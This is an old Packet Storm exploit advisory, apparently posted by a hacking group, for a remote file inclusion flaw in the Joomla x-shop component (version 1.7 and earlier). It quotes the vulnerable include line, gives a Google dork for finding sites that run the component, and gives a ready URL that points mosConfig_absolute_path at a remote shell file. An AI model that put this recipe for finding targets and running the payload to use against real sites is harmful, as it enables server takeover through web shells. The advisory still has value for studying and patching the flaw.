xshop.txt

2006-08-27T00:00:00
ID PACKETSTORM:49376
Type packetstorm
Reporter Crackers_Child
Modified 2006-08-27T00:00:00

Description

                                        
                                            `!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!  
--------------------------------------------------------------------------------  
  
Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability  
  
--------------------------------------------------------------------------------  
#Author: Crackers_Child  
  
  
#cont@ct: crackers_child@sibersavascilar.com  
  
--------------------------------------------------------------------------------  
  
Google Dorks : allinurl:"/com_x-shop/"  
  
------------------------- -------------------------------------------------------  
  
Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047  
  
--------------------------------------------------------------------------------  
Bug in admin.x-shop.php  
  
<?  
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php');  
session_start();  
  
  
--------------------------------------------------------------------------------  
  
Exploit:  
  
http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?  
  
  
--------------------------------------------------------------------------------  
  
greets:  
  
All My Friends And SiberSavascilar.Com Members !  
  
--------------------------------------------------------------------------------  
  
  
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------  
  
  
`